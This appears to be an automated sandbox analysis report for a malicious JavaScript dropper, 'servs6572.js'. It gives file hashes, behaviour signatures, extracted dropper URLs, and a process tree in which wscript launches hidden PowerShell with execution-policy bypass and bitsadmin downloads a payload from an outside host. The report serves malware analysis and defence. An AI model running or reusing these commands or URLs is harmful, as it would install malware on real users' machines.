Overview

overview

10

Static

static

1

servs6572.js

windows7-x64

10

servs6572.js

windows10-2004-x64

10

Analysis

  • max time kernel
    42s
  • max time network
    57s
  • platform
    windows7_x64
  • resource
    win7-20230703-en
  • resource tags

    arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
  • submitted
    08-07-2023 08:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    servs6572.js

  • Size

    46KB

  • MD5

    d0bae3a9204c735791f07d7c0d6d2951

  • SHA1

    e78a56d38f7ed6fa8516f6924f8378e9716bac5c

  • SHA256

    f578371283ea332b5118e584b1c6f0910dad7140554f8a05148f6709c6cad1da

  • SHA512

    ffd13cf98bdc9a00d73a4d13723e11a08926d6204023b941f8f318d870f42d4d54030800629fd746e04a415135d2eea6c99f01408307e9dba353189b3d18c51a

  • SSDEEP

    768:MHisCv89uYMvvd2q8g8oI/+I/aJ09blD31TZPu2Bfjn55BYEPrOBoZKnDM:MCs1lYI/+LJ09bh3NZ221b55BVOBCKDM

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ecotree.co.in/images/cora.zip
exe.dropper

https://ecotree.co.in/images/files/cora.zip

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\servs6572.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\iy2e8pn.ps1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2308
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://ecotree.co.in/images/files/cora.zipAudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll
        3⤵
        • Download via BitsAdmin
        PID:2900

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\iy2e8pn.ps1
    Filesize

    1KB

    MD5

    b00d5e3188907d5a12fdeaea064c1567

    SHA1

    aa76f76b9b4c7af36599410324c1be497b4e5156

    SHA256

    738ad290741e5cb5480fc1a4043099c2fdbafe0d8f1609d35810629155a4a404

    SHA512

    36de1b65b5675a3df2d69884c296059976aa5c6922e2111b11a4c5465cf0c6c3c3ae710d51907bb17b02a9c792f75320e7596a1af352151bd3dbfa90663dbb14

    Download Submit

  • memory/2308-60-0x000000001B240000-0x000000001B522000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2308-61-0x00000000023F0000-0x00000000023F8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2308-62-0x00000000022B0000-0x0000000002330000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2308-63-0x00000000022B0000-0x0000000002330000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2308-65-0x00000000022B0000-0x0000000002330000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2308-66-0x00000000022B0000-0x0000000002330000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2308-67-0x00000000022B0000-0x0000000002330000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2308-68-0x00000000022B0000-0x0000000002330000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2308-69-0x00000000022B0000-0x0000000002330000-memory.dmp

    Filesize

    512KB

    Download